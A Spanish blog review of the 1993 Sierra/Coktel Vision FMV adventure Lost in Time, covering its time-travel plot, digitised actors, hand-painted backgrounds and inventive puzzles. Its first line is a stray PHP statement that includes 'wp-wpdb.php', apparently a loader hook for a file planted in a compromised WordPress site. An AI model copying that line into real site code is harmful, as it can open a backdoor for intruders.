if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Lost in Time, una videoaventura en el tiempo – La Fortaleza de LeChuck

Lost in Time, una videoaventura en el tiempo

Una de las aventuras que descubrí por casualidad y me sorprendió por incluir videos y fondos digitalizados fue Lost in Time, una aventura gráfica point & click publicada por Sierra en 1993 y producida por Coktel Vision (creadores de Inca e Inca 2). Además marcó un punto de inflexión en la industria del videojuego, y estableció un nuevo estándar de excelencia por la que se midieron los juegos posteriores.

Muchos retro-análisis los comienzo contando un trocito de mis primeros recuerdos con el juego en cuestión, y este no iba a ser menos. Lost in Time es una aventura que descubrí puramente de casualidad en una de esas tardes que volvía del cole y aprovechaba que mi hermano no estaba en casa para sentarme delante del PC. Mientras rebuscaba en la montaña de CD para probar un juego nuevo, llego a mis manos un CD suelto serigrafiado con el logo del juego. En un principio no tenía ni idea de qué se trataba, ni si era propiamente un juego, así que lo introduje en la unidad y lo ejecuté. Lost in Time era una videoaventura, una de las primeras y obviamente jamás antes había jugado a algo tan «real». Curiosamente cuando comencé a jugar y vi a la protagonista con sus rizos y su ropa llamativa me dio que pensar si se trataba de un juego erótico, no me pregunteis a que viene esa asociación de ideas, pero ya me estaba imaginando una versión occidental de Cobra Mision, obviamente nada más lejos de la realidad.
Yo pensé que se iba a desnudar, pero no.
Lost in Time tiene una historia fascinante que incluye no sólo viajar en el tiempo, sino también algunos temas que no suelen encontrarse en un juego de aventura, como la esclavitud. Nuestro personaje es Doralice, una joven mujer francesa que acaba de heredar una propiedad de un familiar desconocido. Se trata de una impresionante finca junto al mar que incluye una mansión y un faro, y cerca del lugar se encuentran los restos de un viejo galeón español naufragado. A medida que comienza a explorar la mansión, se encuentra con una figura oscura. Al seguirla desaparece rápidamente por un pasillo, y a continuación Doralice pierde la conciencia. Al despertar aturdida se da cuenta que está en el barco naufragado, lo que ahora está de una pieza ya que nos encontramos en 1840.
¡Vaya choza, colega!

Lost in Time fue anunciado originalmente como una película de aventuras interactiva por su alto contenido en videos, y fue de los primeros juegos en usar actores reales con fondos digitalizados. Los gráficos de fondo son variados y coloridos y fueron pintados a mano por un dibujante de cómic, con más de 30 escenas en Francia y en el Caribe. La aventura tiene distintas perspectivas, la mayor parte del juego sucede en primera persona, pero las secuencias al aire libre, sin embargo, están en 2D y en tercera persona. En el barco sucede todo en primera persona y no incluye fotos reales y es en 3D.
El juego se maneja con el ratón. El botón izquierdo para interactuar con los objetos y en derecho para ver el inventario. Lost in Time fue traducido al español, pero desafortunadamente los subtítulos no se encuentran en los videos de tercera persona donde se desarrolla la mayor parte de la historia. Sin embargo, un diario de a bordo está incluido y registra automáticamente la información más importante y conversaciones, además de proporcionar un lugar para escribir notas que se pueden revisar en cualquier momento.
cuando cogemos un objeto o lo usamos veremos un video de cómo se lleva a cabo la acción
Pero lo que realmente hace que Lost in Time destaque entre la multitud es la naturaleza inusual de los enigmas. Muchos de sus puzles son brillantes y originales, aunque algunos de ellos pueden llegar a ser un verdadero reto. Tendremos que resolverlos con mucho ingenio con los objetos que disponemos y llegaremos a fabricar artilujios sorprendentes (¿Una batería, vinagre, cable y un pomo? Pues claro, un imán!) Otros dependerán de la lógica más pura. Cabe destacar también la banda sonora que nos acompañará, una delicia.
Cuestión de lógica
Lost in Time se adelantó a su tiempo en muchos aspectos y realmente lo que me sorprendió es lo real que lo hacían los actores, y si sumamos la historia bien llevada y los puzles refrescantes, es una gran aventura a tener en cuenta.

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

3 comentarios

Dejar un comentario